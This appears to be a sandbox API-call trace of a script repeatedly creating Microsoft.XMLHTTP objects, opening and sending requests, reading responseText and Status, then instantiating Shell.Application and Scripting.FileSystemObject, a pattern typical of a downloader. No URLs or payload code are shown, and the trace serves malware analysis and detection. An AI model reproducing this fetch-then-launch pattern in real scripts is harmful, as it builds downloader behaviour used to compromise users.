	[0236.272] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5ba0) returned 0x0
	[0236.272] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0236.272] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0236.272] ??2@YAPEAX_K@Z () returned 0x62f310
	[0236.272] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f310) 
	[0236.272] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0236.272] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0236.272] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5ba0) returned 0x0
	[0236.272] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5ba0) returned 0x3
	[0236.272] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0236.272] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0236.273] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0236.273] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0236.273] SysStringLen (param_1=0x0) returned 0x0
	[0236.273] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0236.273] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0236.273] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0236.273] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0236.273] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0236.273] ??2@YAPEAX_K@Z () returned 0x62f330
	[0236.273] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f330) 
	[0236.273] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0236.273] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0236.273] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0236.273] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0236.273] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0236.274] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0236.274] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0236.274] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0236.274] SysStringLen (param_1=0x0) returned 0x0
	[0236.274] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0236.274] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0236.274] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0236.274] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0236.274] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0236.274] ??2@YAPEAX_K@Z () returned 0x62f310
	[0236.274] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f310) 
	[0236.274] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0236.274] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0236.274] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0236.274] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0236.274] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0236.275] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0236.275] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0236.275] longjmp () 
	[0236.275] longjmp () 
	[0236.275] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0236.275] SysStringLen (param_1=0x0) returned 0x0
	[0236.275] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0236.275] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0236.275] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7560) returned 0x0
	[0236.275] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0236.275] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b88) returned 0x0
	[0236.275] ??2@YAPEAX_K@Z () returned 0x62f330
	[0236.275] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b88, pUnkSite=0x62f330) 
	[0236.275] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0236.275] XMLHTTPRequest:IUnknown:Release (This=0x49c5b88) returned 0x0
	[0236.275] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7560) returned 0x0
	[0236.276] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7560) returned 0x3
	[0236.276] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0236.276] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0236.276] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0236.276] longjmp () 
	[0236.276] longjmp () 
	[0236.276] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0236.276] SysStringLen (param_1=0x0) returned 0x0
	[0236.276] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0236.276] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0236.276] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0236.276] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0236.276] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bd8) returned 0x0
	[0236.277] ??2@YAPEAX_K@Z () returned 0x62f310
	[0236.277] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bd8, pUnkSite=0x62f310) 
	[0236.277] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0236.277] XMLHTTPRequest:IUnknown:Release (This=0x49c5bd8) returned 0x0
	[0236.277] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0236.277] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0236.277] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0236.277] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0236.277] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0236.277] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0236.277] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0236.277] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0236.726] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0236.726] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0236.726] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0236.726] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0236.726] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0236.726] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0236.727] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0236.727] SysStringLen (param_1=0x0) returned 0x0
	[0236.727] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0236.727] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0236.727] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0236.727] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0236.727] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0236.727] ??2@YAPEAX_K@Z () returned 0x62f350
	[0236.727] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0236.727] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0236.727] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0236.727] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0236.727] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0236.727] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0236.727] SysStringLen (param_1=0x0) returned 0x0
